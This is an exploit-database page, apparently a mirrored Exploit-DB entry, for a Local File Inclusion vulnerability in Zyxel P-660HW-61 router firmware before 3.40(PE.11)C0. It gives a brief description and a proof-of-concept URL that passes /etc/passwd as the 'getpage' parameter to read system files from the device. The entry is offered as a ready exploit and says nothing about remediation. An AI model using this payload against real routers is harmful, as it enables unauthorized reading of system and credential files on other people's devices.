[] NeoSense
E X P L O I T S
title author type platform port cve id

Zyxel P-660HW-61 Firmware < 3.40(PE.11)C0 Router - Local File Inclusion

Author: ReverseBrain
type: webapps
platform: hardware
port: 
date_added: 2017-05-12 
date_updated: 2017-10-03 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: Zyxel P-660HW-61 < 3.40(PE.11)C0 - Local File Inclusion
# Date: 2-05-2017
# Exploit Author: ReverseBrain
# Contact: https://www.twitter.com/ReverseBrain
# Vendor Homepage: https://www.zyxel.com
# Software Link: ftp://ftp.zyxel.com/P-660HW-61/firmware/P-660HW-61_3.40(PE.11)C0.zip
# Version: 3.40(PE.11)C0

1. Description

Any user who can login into the router can exploit the Local File Inclusion
reading files stored inside the device.

2. Proof of Concept

Login into the router and use the path of a file you want to read as
getpage parameter. For example:

http://ROUTER_IP/cgi-bin/webcm?getpage=/etc/passwd
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.